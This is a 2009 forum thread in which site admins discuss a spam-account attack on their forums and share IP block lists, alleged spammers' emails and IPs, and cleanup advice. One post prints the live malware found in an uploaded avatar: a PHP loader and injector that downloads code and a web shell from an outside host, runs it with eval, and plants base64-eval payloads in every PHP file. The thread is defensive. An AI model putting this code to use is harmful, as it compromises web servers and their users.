If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:

Code: [Select]
order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all
Title: Re: Hacked, script injection
Post by: Sunday Driver on May 08, 2009, 10:50:28 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

magicpromotionmm@gmail.com
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

Interesting, I had that user on my forum for a while. It took me a few days before I found it and banned the IP, but it never uploaded an avatar. Thankfully!
Title: Re: Hacked, script injection
Post by: busterone on May 08, 2009, 11:00:15 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:

Code: [Select]
order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all
I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
Title: Re: Hacked, script injection
Post by: JBlaze on May 08, 2009, 11:28:57 PM
OK, since I am getting quite a few PM's from members who are having problems with this hack on their forums, let me make it clear that I DO NOT offer PM support. Any PM's requesting support without my prior consent WILL BE IGNORED/DELETED!

If you wish to recieve support from me regarding this hack, whether it be cleaning it or just pure advice on how to do it yourself, please see my Help Available (http://www.simplemachines.org/community/index.php?topic=302699.0) topic and we will go from there.

I am sorry to sound cranky/senile/whatever... but to be quite honest, it's getting ridiculous. I try my best to offer support when I can and I do have a heart believe it or not. But PM'ing me for support just drives me up a wall. The reason for these forums is so that everyone can see the issue and everyone can provide some help where they can.

So pretty please with lots of sugar on top, do not PM me unless I give you consent to do so. Thank you.

Regards,
JBlaze
Title: Re: Hacked, script injection
Post by: oakview on May 09, 2009, 03:41:21 AM
Quote
I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
@busterone - Like I said in my post,
Quote
the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest.
If you are multi-national as I'm sure many forums are, that approach is not for you. For those that aren't however, it is an option to be considered, carefully considered.
Title: Re: Hacked, script injection
Post by: busterone on May 09, 2009, 08:49:14 AM
No problem. If it works, it works.  :)
Title: Re: Hacked, script injection
Post by: Soulgirl on May 09, 2009, 09:13:09 AM
I had this problem too... cleaned everything out and still had problems.  Google led me here and I too had krisbarteo as a member.  Banned and deleted him and everything's back to normal.

Thanks guys :)
Title: Re: Hacked, script injection
Post by: NinjaZXR on May 09, 2009, 11:32:16 AM
I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD

Rather than editing all php files I just replaced all files and folders from a recent backup.
No more errors on the forum.
This should serve as a good reminder to create regular backups.
Title: Re: Hacked, script injection
Post by: tumbleweed on May 09, 2009, 10:07:51 PM
appears our friend has posted up his tactics all these folks tried to join within a day:

415 marpmayclerax  biassuhsova@mail.ru 194.8.75.16 Today at 12:28:03 AM   
416 JeoneeCausa  fenteeignitle@gawab.com 213.163.65.83 Today at 12:54:40 AM   
417 totonoittee  cixestith@gmail.com 71.230.120.176 Today at 01:41:29 AM   
418 auditajaw  kacidarp@gawab.com 89.28.3.241 Today at 02:51:53 AM   
419 intitrelf  walljason2@gmail.com 221.116.142.90 Today at 03:57:37 AM   
420 mamHoaphons  gahaganyquati@gmail.com 195.2.240.117 Today at 04:07:06 AM   
421 KesBreaphWese  aaasf3r@atlantmail.com 194.8.75.15 Today at 05:52:15 AM   
422 drycletefetle  tntxqualackeyuev@gmail.com 194.8.75.54 Today at 05:59:14 AM   
423 nupabadoPeeda  tlggnbairdqyenxuy@gmail.com 194.8.75.42 Today at 06:01:03 AM   
424 ðàñêðóòêà ñàéòîâ  galawebsuper@gmail.com 95.220.71.169 Today at 08:00:57 AM   
425 wowgoldstright  sdfgsdfgsdfg4@gmail.com 89.149.217.184 Today at 08:12:47 AM   
426 guenciede  aspewmeks@mail.com 64.56.73.226 Today at 09:45:28 AM   
427 getapruntee  0017@s7ak.com 221.179.6.85 Today at 09:47:13 AM   
428 adefeclew  viactiono@mail.ru 86.57.155.242 Today at 10:02:56 AM   
429 Natreseearm  kankurikapsss@gmail.com 94.178.5.237 Today at 11:04:13 AM   
430 nuyullerxruu  govagova296@mail.ru 94.102.51.196 Today at 11:59:40 AM   
431 eagetaacitire  masternasty@mail.com 87.117.35.79 Today at 12:17:42 PM   
432 voidonduchend  admin5@hustlestore.info 95.24.206.154 Today at 12:59:28 PM   
433 irrapeApocA  selepiern@mail.com 64.56.73.226 Today at 03:20:13 PM   
434 inardynutty  ruschgityfyfo@gmail.com 195.2.240.117 Today at 03:30:09 PM   
435 Veinswaw  kristina777@assemlervc1.com 65.15.161.58 Today at 05:10:38 PM   
436 JernHinna  enrillalons@mail.com 64.56.73.226 Today at 05:13:52 PM   
437 Injecume  scoti@sbestmuzzxfix.com 68.32.158.166 Today at 06:58:25 PM   
438 Infefsendeamp  frievaima@mail.com 64.56.73.226 Today at 07:02:38 PM   
439 Dimbsuisa  mielucucocoselus@mail.ru 86.121.176.110 Today at 07:05:38 PM   
   
Hope every one has tightend up the forums.
Title: Re: Hacked, script injection
Post by: JBlaze on May 09, 2009, 10:25:20 PM
Mines sealed up tighter than a crabs ass :P
Title: Re: Hacked, script injection
Post by: busterone on May 09, 2009, 10:48:53 PM
 :D
Mine as well. I haven't even had a valid registration in 3 days.
Title: Re: Hacked, script injection
Post by: WillyP on May 09, 2009, 11:04:21 PM
One of my forums got hit by Krisbarteo too. Every php file on the domain same as described here. So I created a post based member group to prevent uploading and attaching until a member has 10 posts. There was an uploaded avatar, the only avatar that was a jpg, 1x1 pixel. Opened it up and sure enough php code. I wonder if the upload script could compare file size to image size and flag suspicious files? Would this be easier than scanning a file for php tags? For that matter, who would ever upload a 1x1 image anyway?  Of course, if a minimum image size was enacted, it would be pretty easy for someone to just use a larger image.
Title: Re: Hacked, script injection
Post by: chrishicks on May 09, 2009, 11:46:37 PM
Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.
Title: Re: Hacked, script injection
Post by: tjhanes on May 10, 2009, 06:07:37 AM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

Code: [Select]
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
and this is the code on that page:
Code: [Select]
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
